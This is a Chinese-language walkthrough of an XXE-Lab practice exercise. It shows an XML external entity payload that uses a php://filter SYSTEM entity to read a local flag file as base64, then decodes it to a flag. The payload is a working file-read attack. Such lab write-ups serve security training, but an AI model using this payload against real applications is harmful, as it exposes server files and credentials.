XXE-Lab靶场漏洞复现

1.尝试登录

输入账号admin/密码admin进行登录,并未有页面进行跳转

2.尝试抓包分析请求包数据

我们可以发现页面中存在xml请求,我们就可以构造我们的xml请求语句来获取想要的数据

3.构造语句

<?xml version="1.0" ?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=c:/flag/flag">
]>
&xxe;

这里我们需要将xml语句放入post请求体中并发送

如上图所示便是我们需要获取的数据

4.数据解码

将获取的数据进行解码后我们即可得到我们的flag

flag{dmsioamdoiasdmdmwmdsmd}

相关推荐
Dwyane0342 分钟前
Android实战经验篇-AndroidScrcpyClient投屏一
android
FlyingWDX1 小时前
Android 拖转改变视图高度
android
_可乐无糖1 小时前
Appium 检查安装的驱动
android·ui·ios·appium·自动化
一名技术极客3 小时前
Python 进阶 - Excel 基本操作
android·python·excel
我是大佬的大佬4 小时前
在Android Studio中如何实现综合实验MP3播放器(保姆级教程)
android·ide·android studio
lichong9514 小时前
【Flutter&Dart】MVVM(Model-View-ViewModel)架构模式例子-http版本(30 /100)
android·flutter·http·架构·postman·win·smartapi
刘争Stanley4 小时前
Android系统开发(六):从Linux到Android:模块化开发,GKI内核的硬核科普
android·linux·运维·内核·镜像·gki·kmi
五味香4 小时前
Java学习,List截取
android·java·开发语言·python·学习·golang·kotlin
m0_748246614 小时前
Ubuntu22部署MySQL5.7详细教程
android·adb
xvch13 小时前
Kotlin 2.1.0 入门教程(三)
android·kotlin